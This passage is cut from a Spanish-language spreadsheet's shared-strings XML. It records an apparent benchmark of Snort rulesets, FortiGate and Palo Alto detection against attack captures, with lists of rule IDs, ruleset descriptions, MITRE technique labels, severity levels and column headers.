2151, 1458, 2137, 2397, 1525, 2215, 2223, 1787, 1724, 1723, 2204, 2205, 2206, 2073, 2225, 2130, 2131, 2214, 2086, 2085, 2219, 2133, 1434, 1433, 1872, 1874, 839, 941, 945, 980, 942, 947, 968, 956, 949, 957, 990, 953, 951, 959, 964, 2447, 1070, 1559, 2395, 2326, 2196, 948, 1851, 1110, 1489, 1571, 818, 1032, 1033, 1034, 1035, 1036, 2142, 2141, 1527, 1526, 902, 1520, 1209, 1770, 1769, 1004, 2276, 2143, 1671, 2363, 1399, 1091, 2285, 2140, 886, 2281, 2288, 2298, 43285</t>
  </si>
  <si>
    <t>2009358 (4), 2024364 (4), 2010937 (1), 2010939 (1), 2010938 (1), 2002911 (1), 2010936 (1), 2010935 (1), 2002910 (1), 2100257 (1), 2100598 (1), 384 (1), 453 (1), 408 (1), 451 (1), 1421 (1), 1420 (1), 1418 (1), 257 (1), 598 (1)</t>
  </si>
  <si>
    <t>2009358, 2024364, 2010937, 2010939, 2010938, 2002911, 2010936, 2010935, 2002910, 2100257, 2100598, 384, 453, 408, 451, 1421, 1420, 1418, 257, 598</t>
  </si>
  <si>
    <t>2018359 (908), 2033952 (454), 1394 (34), 18 (7), 12 (5), 2053459 (2), 2035480 (2), 2025644 (2), 3 (1), 2018959 (1)</t>
  </si>
  <si>
    <t>2018359, 2033952, 1394, 18, 12, 2053459, 2035480, 2025644, 3, 2018959</t>
  </si>
  <si>
    <t>2043217 (11), 648 (3), 28 (1), 2034567 (1), 2013028 (1), 2019240 (1), 1200 (1), 1390 (1)</t>
  </si>
  <si>
    <t>2043217, 648, 28, 2034567, 2013028, 2019240, 1200, 1390</t>
  </si>
  <si>
    <t>5 (22), 2043217 (7), 7 (2), 2016538 (2), 648 (2), 2018959 (1), 2014520 (1), 1200 (1), 1390 (1)</t>
  </si>
  <si>
    <t>5, 2043217, 7, 2016538, 648, 2018959, 2014520, 1200, 1390</t>
  </si>
  <si>
    <t>12 (2), 648 (2), 28 (1), 2034567 (1), 2013028 (1), 2019240 (1), 2044770 (1), 1200 (1)</t>
  </si>
  <si>
    <t>12, 648, 28, 2034567, 2013028, 2019240, 2044770, 1200</t>
  </si>
  <si>
    <t>12 (1), 402 (1)</t>
  </si>
  <si>
    <t>12, 402</t>
  </si>
  <si>
    <t>1917 (13), 254 (1)</t>
  </si>
  <si>
    <t>1917, 254</t>
  </si>
  <si>
    <t>5 (4), 1917 (4)</t>
  </si>
  <si>
    <t>5, 1917</t>
  </si>
  <si>
    <t>19439 (1), 19 (1), 2034567 (1), 2013028 (1), 1394 (1)</t>
  </si>
  <si>
    <t>19439, 19, 2034567, 2013028, 1394</t>
  </si>
  <si>
    <t>2008538 (72), 2053459 (18), 2053468 (15), 2006446 (14), 2053465 (14), 2053480 (4), 2053466 (2), 19439 (1), 2017808 (1), 2049400 (1), 2009815 (1), 2009714 (1), 1061 (1), 1122 (1), 1147 (1)</t>
  </si>
  <si>
    <t>2008538, 2053459, 2053468, 2006446, 2053465, 2053480, 2053466, 19439, 2017808, 2049400, 2009815, 2009714, 1061, 1122, 1147</t>
  </si>
  <si>
    <t>2021076 (12), 2022858 (8), 2016141 (8), 1917 (8), 2018959 (6), 1 (4), 1200 (4), 12 (3), 2035480 (2), 2025644 (2)</t>
  </si>
  <si>
    <t>2021076, 2022858, 2016141, 1917, 2018959, 1, 1200, 12, 2035480, 2025644</t>
  </si>
  <si>
    <t>12 (6), 2001330 (2), 1448 (2), 402 (1)</t>
  </si>
  <si>
    <t>12, 2001330, 1448, 402</t>
  </si>
  <si>
    <t>12 (6), 1325 (1)</t>
  </si>
  <si>
    <t>12 (2), 1325 (1)</t>
  </si>
  <si>
    <t>41978 (15), 1394 (13), 12 (6), 18 (5), 2102465 (2), 2035480 (2), 42944 (1), 3 (1), 2025992 (1), 2025649 (1), 2025650 (1), 2024297 (1), 2018959 (1), 2025644 (1)</t>
  </si>
  <si>
    <t>41978, 1394, 12, 18, 2102465, 2035480, 42944, 3, 2025992, 2025649, 2025650, 2024297, 2018959, 2025644</t>
  </si>
  <si>
    <t>33 (26), 18 (26), 3 (23), 15 (21), 12 (18), 254 (1)</t>
  </si>
  <si>
    <t>33, 18, 3, 15, 12, 254</t>
  </si>
  <si>
    <t>1917 (4), 402 (3), 12 (1), 2031379 (1), 2041131 (1), 2016141 (1), 2035480 (1), 2025644 (1), 46979 (1)</t>
  </si>
  <si>
    <t>1917, 402, 12, 2031379, 2041131, 2016141, 2035480, 2025644, 46979</t>
  </si>
  <si>
    <t>1917 (12), 12 (5), 2035480 (1), 2025644 (1)</t>
  </si>
  <si>
    <t>1917, 12, 2035480, 2025644</t>
  </si>
  <si>
    <t>33 (2), 18 (2), 3 (2), 254 (2)</t>
  </si>
  <si>
    <t>33, 18, 3, 254</t>
  </si>
  <si>
    <t>402 (669), 54827 (21)</t>
  </si>
  <si>
    <t>402, 54827</t>
  </si>
  <si>
    <t>15 (6), 4 (5), 12 (5), 8 (2), 1325 (1)</t>
  </si>
  <si>
    <t>15, 4, 12, 8, 1325</t>
  </si>
  <si>
    <t>18 (150), 40063 (92), 12 (63), 2012870 (1)</t>
  </si>
  <si>
    <t>18, 40063, 12, 2012870</t>
  </si>
  <si>
    <t>1394 (14), 12 (8), 1917 (4), 1 (3), 5 (1), 3065 (1)</t>
  </si>
  <si>
    <t>1394, 12, 1917, 1, 5, 3065</t>
  </si>
  <si>
    <t>33 (8), 18 (8), 3 (8), 254 (5), 15 (1)</t>
  </si>
  <si>
    <t>33, 18, 3, 254, 15</t>
  </si>
  <si>
    <t>2008118 (93), 5 (11), 1394 (4), 12 (2), 2008120 (2), 1444 (2), 7 (1), 2008119 (1), 2019240 (1), 2018959 (1), 648 (1), 1325 (1)</t>
  </si>
  <si>
    <t>2008118, 5, 1394, 12, 2008120, 1444, 7, 2008119, 2019240, 2018959, 648, 1325</t>
  </si>
  <si>
    <t>12 (157), 18 (26), 2001330 (17), 1448 (17), 3 (16), 1917 (6), 2027413 (1)</t>
  </si>
  <si>
    <t>12, 18, 2001330, 1448, 3, 1917, 2027413</t>
  </si>
  <si>
    <t>20 (1169), 12 (25), 1292 (2)</t>
  </si>
  <si>
    <t>20, 12, 1292</t>
  </si>
  <si>
    <t>2043343 (12), 2044076 (12), 12 (10), 1 (4), 2021076 (2), 2016141 (1), 2018959 (1), 2025644 (1), 1200 (1)</t>
  </si>
  <si>
    <t>2043343, 2044076, 12, 1, 2021076, 2016141, 2018959, 2025644, 1200</t>
  </si>
  <si>
    <t>2100366 (5), 366 (5), 29456 (5), 384 (5), 408 (5), 20 (1)</t>
  </si>
  <si>
    <t>2100366, 366, 29456, 384, 408, 20</t>
  </si>
  <si>
    <t>12 (13), 2010781 (10), 2025701 (2), 2025699 (1), 2027237 (1), 459 (1), 402 (1)</t>
  </si>
  <si>
    <t>12, 2010781, 2025701, 2025699, 2027237, 459, 402</t>
  </si>
  <si>
    <t>12 (6), 2000418 (1), 1325 (1)</t>
  </si>
  <si>
    <t>12, 2000418, 1325</t>
  </si>
  <si>
    <t>12 (21291), 2101201 (914), 1201 (914), 1213 (760), 882 (760), 895 (608), 2027250 (456), 1288 (456), 2101129 (304), 2101071 (304), 2101016 (304), 2027263 (304), 1129 (304), 1071 (304), 1016 (304), 1141 (304), 1826 (304), 1521 (153), 2049402 (152), 2027261 (152), 2022520 (152), 2101145 (152), 2100993 (152), 2019526 (152), 2101877 (152), 1434 (152), 1433 (152), 2062 (152), 43285 (152), 940 (152), 937 (152), 1662 (152), 1489 (152), 1145 (152), 1301 (152), 879 (152), 1218 (152), 845 (152), 885 (152), 1206 (152), 1231 (152), 1668 (152), 1543 (152), 1551 (152), 839 (152), 825 (152), 1606 (152), 993 (152), 886 (152), 1877 (152), 1852 (152), 1520 (152), 835 (152), 849 (152), 896 (152), 853 (152), 43290 (152), 887 (152), 1025 (2), 2018413 (1), 2010229 (1), 1029 (1)</t>
  </si>
  <si>
    <t>12, 2101201, 1201, 1213, 882, 895, 2027250, 1288, 2101129, 2101071, 2101016, 2027263, 1129, 1071, 1016, 1141, 1826, 1521, 2049402, 2027261, 2022520, 2101145, 2100993, 2019526, 2101877, 1434, 1433, 2062, 43285, 940, 937, 1662, 1489, 1145, 1301, 879, 1218, 845, 885, 1206, 1231, 1668, 1543, 1551, 839, 825, 1606, 993, 886, 1877, 1852, 1520, 835, 849, 896, 853, 43290, 887, 1025, 2018413, 2010229, 1029</t>
  </si>
  <si>
    <t>18 (26), 2009358 (10), 2024364 (10), 14 (4), 8 (3), 3 (3), 33 (3), 2010937 (3), 32 (2), 2010939 (2), 2010935 (2), 2010936 (2), 1421 (2), 1418 (2), 2002911 (1), 2002910 (1), 2023753 (1), 2018317 (1), 2034718 (1), 2013409 (1), 2034730 (1)</t>
  </si>
  <si>
    <t>18, 2009358, 2024364, 14, 8, 3, 33, 2010937, 32, 2010939, 2010935, 2010936, 1421, 1418, 2002911, 2002910, 2023753, 2018317, 2034718, 2013409, 2034730</t>
  </si>
  <si>
    <t>12 (183), 1213 (5), 882 (5), 2101201 (4), 1201 (4), 895 (4), 2027250 (3), 1288 (3), 2101016 (2), 2027263 (2), 1016 (2), 1141 (2), 1826 (2), 2049402 (1), 2101129 (1), 2101071 (1), 2027261 (1), 2022520 (1), 2101145 (1), 2010229 (1), 2100993 (1), 2019526 (1), 2101877 (1), 1434 (1), 1433 (1), 1129 (1), 1071 (1), 2062 (1), 43285 (1), 940 (1), 937 (1), 1662 (1), 1489 (1), 1145 (1), 1301 (1), 879 (1), 1218 (1), 845 (1), 885 (1), 1206 (1), 1231 (1), 1668 (1), 1543 (1), 1551 (1), 839 (1), 825 (1), 1606 (1), 993 (1), 886 (1), 1877 (1), 1852 (1), 1520 (1), 1521 (1), 835 (1), 849 (1), 896 (1), 853 (1), 43290 (1), 887 (1)</t>
  </si>
  <si>
    <t>12, 1213, 882, 2101201, 1201, 895, 2027250, 1288, 2101016, 2027263, 1016, 1141, 1826, 2049402, 2101129, 2101071, 2027261, 2022520, 2101145, 2010229, 2100993, 2019526, 2101877, 1434, 1433, 1129, 1071, 2062, 43285, 940, 937, 1662, 1489, 1145, 1301, 879, 1218, 845, 885, 1206, 1231, 1668, 1543, 1551, 839, 825, 1606, 993, 886, 1877, 1852, 1520, 1521, 835, 849, 896, 853, 43290, 887</t>
  </si>
  <si>
    <t>2043343 (4), 2044076 (4), 12 (3), 3 (3), 24253 (2), 1 (1), 2012886 (1)</t>
  </si>
  <si>
    <t>2043343, 2044076, 12, 3, 24253, 1, 2012886</t>
  </si>
  <si>
    <t>12 (7), 1325 (3), 5 (1), 4 (1)</t>
  </si>
  <si>
    <t>12, 1325, 5, 4</t>
  </si>
  <si>
    <t>2101411 (396), 1411 (396), 1417 (396)</t>
  </si>
  <si>
    <t>2101411, 1411, 1417</t>
  </si>
  <si>
    <t>12 (24), 2044770 (1), 2019240 (1), 1325 (1)</t>
  </si>
  <si>
    <t>12, 2044770, 2019240, 1325</t>
  </si>
  <si>
    <t>2013504 (157), 15 (26), 33 (18), 18 (18), 3 (17), 1 (10), 254 (3), 12 (1)</t>
  </si>
  <si>
    <t>2013504, 15, 33, 18, 3, 1, 254, 12</t>
  </si>
  <si>
    <t>1917 (4), 1 (1), 12 (1), 2018959 (1), 2035480 (1), 2025644 (1), 1200 (1)</t>
  </si>
  <si>
    <t>1917, 1, 12, 2018959, 2035480, 2025644, 1200</t>
  </si>
  <si>
    <t>12 (16), 1917 (4), 1 (2)</t>
  </si>
  <si>
    <t>12, 1917, 1</t>
  </si>
  <si>
    <t>SNORT (v2.9)</t>
  </si>
  <si>
    <t>RuleSets Omitidos</t>
  </si>
  <si>
    <t>Paquete de Reglas</t>
  </si>
  <si>
    <t>Descripción</t>
  </si>
  <si>
    <t>Fichero</t>
  </si>
  <si>
    <t>Nº de Reglas</t>
  </si>
  <si>
    <t>Versión</t>
  </si>
  <si>
    <t>Fecha</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">RS10
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>≈</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="9.35"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> RS3 (RS7 sólo aporta 1 SID)</t>
    </r>
  </si>
  <si>
    <t>RS11
= RS6</t>
  </si>
  <si>
    <t>RS12
= RS6</t>
  </si>
  <si>
    <t>Talos Registered
(por defecto)</t>
  </si>
  <si>
    <t>Reglas supervisadas por el grupo Talos, tal como se descargan para Snort v2.9 (sin modificar configuración ni reglas comentadas)
Fusión de todos los ficheros ".rules" del paquete (preproc_rules, rules y so_rules) que tienen el "include" SIN comentar</t>
  </si>
  <si>
    <t>registered-all.rules</t>
  </si>
  <si>
    <t>ETOpen
(por defecto)</t>
  </si>
  <si>
    <t>Reglas "Emerging Threats", tal como se descargan (sin modificar configuración ni reglas comentadas)</t>
  </si>
  <si>
    <t>emerging-all.rules</t>
  </si>
  <si>
    <t>https://rules.emergingthreats.net/open/snort-2.9.0/</t>
  </si>
  <si>
    <t>Talos Registered
(máxima CD)</t>
  </si>
  <si>
    <t>registered-all-descomentadas.rules</t>
  </si>
  <si>
    <t>ETOpen
(máxima CD)</t>
  </si>
  <si>
    <t>ETOpen, descomentando todas las reglas (salvo las reglas marcadas como "msg:"ET DELETED" o fichero "emerging-deleted.rules" - hay "12271" deleted)</t>
  </si>
  <si>
    <t>emerging-all-descomentadas.rules</t>
  </si>
  <si>
    <t>Talos Community (por defecto)</t>
  </si>
  <si>
    <t>Reglas de la Comunidad (GPLv2), tal como se descargan (sin modificar reglas comentadas)</t>
  </si>
  <si>
    <t>community.rules</t>
  </si>
  <si>
    <t>561
* Talos Registered por defecto: Todas salvo 1 (sid:59735)
* Registered máxima CD: Todas</t>
  </si>
  <si>
    <t>✔
(sólo aporta 1 SID, 59735)</t>
  </si>
  <si>
    <t>✔
(contenido en RS4)</t>
  </si>
  <si>
    <t>Talos Community (máxima CD)</t>
  </si>
  <si>
    <t>Reglas de la Comunidad (GPLv2), descomentando todas las reglas</t>
  </si>
  <si>
    <t>4013
* Talos Registered por defecto: No contiene 3453 (560 reglas en común, las no comentadas, salvo "sid:59735")
* Registered máxima CD: Todas</t>
  </si>
  <si>
    <t>Nº de alertas FP a filtrar por cada TP</t>
  </si>
  <si>
    <t>= #Alertas_FP / #Alertas_TP</t>
  </si>
  <si>
    <t>T1667-Email_bombing</t>
  </si>
  <si>
    <t>T1011-Exfiltration</t>
  </si>
  <si>
    <t>T1565.002-DNS_spoofing</t>
  </si>
  <si>
    <t>#AttackID</t>
  </si>
  <si>
    <t>#ThreatID</t>
  </si>
  <si>
    <t>#SIDs, #AttackID o #ThreatID</t>
  </si>
  <si>
    <t>FORTIGATE</t>
  </si>
  <si>
    <t>Nombre Reglas</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">#Reglas IPS
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="7"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>(Security Profiles / IPS Signatures)</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">#Reglas Aplicación
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="7"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>(Security Profiles / Application Signatures)</t>
    </r>
  </si>
  <si>
    <t>IPS Definitions</t>
  </si>
  <si>
    <t>IPS Engine</t>
  </si>
  <si>
    <t>Dispositivo</t>
  </si>
  <si>
    <t>FortiGate</t>
  </si>
  <si>
    <t>Consulta de reglas IPS:
https://fortiguard.fortinet.com/encyclopedia/ips/xxx</t>
  </si>
  <si>
    <t>Version 33.00053</t>
  </si>
  <si>
    <t>Version 7.00600</t>
  </si>
  <si>
    <t>FGVM02</t>
  </si>
  <si>
    <t>PALOALTO NGFW</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">#Reglas IPS
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="7"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>(OBJECTS &gt; Security Profiles &gt; Vulnerability Protection &gt; ESI &gt; Exceptions
   &gt; Marcar "Show All signatures")</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">#Reglas Aplicación
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="7"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>(OBJECTS &gt; Applications)</t>
    </r>
  </si>
  <si>
    <t>PaloAlto</t>
  </si>
  <si>
    <t>Consulta de reglas IPS:
https://threatvault.paloaltonetworks.com/?query=xxxxx</t>
  </si>
  <si>
    <t>PAN-OS 10.2.11</t>
  </si>
  <si>
    <t>PA-VM</t>
  </si>
  <si>
    <t>#Flujos con Ataques detectados (con attackid y/o appid)</t>
  </si>
  <si>
    <t>#Flujos con Ataques detectados (con threatid y/o appid)</t>
  </si>
  <si>
    <t>Talos Community SIN interés</t>
  </si>
  <si>
    <t>pcap apto para Estudio FG/PA</t>
  </si>
  <si>
    <t>FORMATO PCAPNG (no pcap)</t>
  </si>
  <si>
    <t>pcap apto para Estudio IDSs</t>
  </si>
  <si>
    <t>✔ (paquetes con tamaño 0)</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Ataque válido según </t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FFFF0000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">MITRE </t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="15"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(Network detection)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="20"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">Ataque (pcap) </t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="20"/>
        <color rgb="FFFF0000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>válido para análisis IDSs (L3)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="20"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">Ataque (pcap) </t>
    </r>
    <r>
      <rPr>
        <b/>
        <i/>
        <sz val="20"/>
        <color rgb="FFFF0000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>apto para FG/PA</t>
    </r>
  </si>
  <si>
    <t>PROCESO DE GENERACIÓN DEL PCAP</t>
  </si>
  <si>
    <t>VALIDACIÓN DEL PCAP</t>
  </si>
  <si>
    <t>ANÁLISIS DE DETECCIONES DEL PCAP (Snort)</t>
  </si>
  <si>
    <t>ERROR TCPREPLAY</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">CONTIENE SÓLO FLUJOS COMPLETOS CON
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="13"/>
        <color rgb="FFFF0000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>TCP SYN</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> INICIAL</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">TRAMAS &gt; </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="14"/>
        <color rgb="FFFF0000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>4000 Bytes</t>
    </r>
  </si>
  <si>
    <t>T1041-exfiltration_over_c2_channel</t>
  </si>
  <si>
    <t>Crítica</t>
  </si>
  <si>
    <t>Alta</t>
  </si>
  <si>
    <t>Media</t>
  </si>
  <si>
    <t>Baja</t>
  </si>
  <si>
    <t>Niveles de Prioridad/Riesgo/Severidad</t>
  </si>
  <si>
    <t>info</t>
  </si>
  <si>
    <t>low</t>
  </si>
  <si>
    <t>medium</t>
  </si>
  <si>
    <t>high</t>
  </si>
  <si>
    <t>critical</t>
  </si>
  <si>
    <t>information</t>
  </si>
  <si>
    <t>elevated</t>
  </si>
  <si>
    <t>Informational</t>
  </si>
  <si>
    <t>Lowal</t>
  </si>
  <si>
    <t>Medium</t>
  </si>
  <si>
    <t>High</t>
  </si>
  <si>
    <t>Critical</t>
  </si>
  <si>
    <t>Information</t>
  </si>
  <si>
    <t>Low</t>
  </si>
  <si>
    <t>Elevated</t>
  </si>
  <si>
    <t>Sólo quita (A)</t>
  </si>
  <si>
    <r>
      <t>RS1</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</si>
  <si>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RS2</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</si>
  <si>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RS3</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</si>
  <si>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RS4</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</si>
  <si>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RS5</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</si>
  <si>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RS6</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</si>
  <si>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RS7</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</si>
  <si>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RS8</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</si>
  <si>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r>
      <t>RS9</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> [Priority = </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Any</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <t>Proporción de TN en el tráfico legítimo</t>
  </si>
  <si>
    <t>(salvo FPR y Usabilidad, que interesan próximos a 0)</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FFC00000"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>RS2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t/>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FFC00000"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>RS3</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t/>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FFC00000"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>RS4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t/>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FFC00000"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>RS5</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t/>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FFC00000"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>RS6</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t/>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FFC00000"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>RS8</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t/>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FFC00000"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>RS9</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t/>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FFC00000"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>RS1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> [Priority </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&lt;= 4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> (</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Any)</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t>Snort
[</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Priority</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>]</t>
    </r>
  </si>
  <si>
    <r>
      <t>IPS
(</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>severity</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>)</t>
    </r>
  </si>
  <si>
    <r>
      <t>APP
(</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>apprisk</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>)</t>
    </r>
  </si>
  <si>
    <r>
      <t>IPS (</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>severity_number</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>)</t>
    </r>
  </si>
  <si>
    <r>
      <t>APP
(</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>risk_of_app</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FFC00000"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>ADVERTIR:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FFC00000"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Snort y FG/PA usan "N" en </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color rgb="FF7030A0"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>orden inverso</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
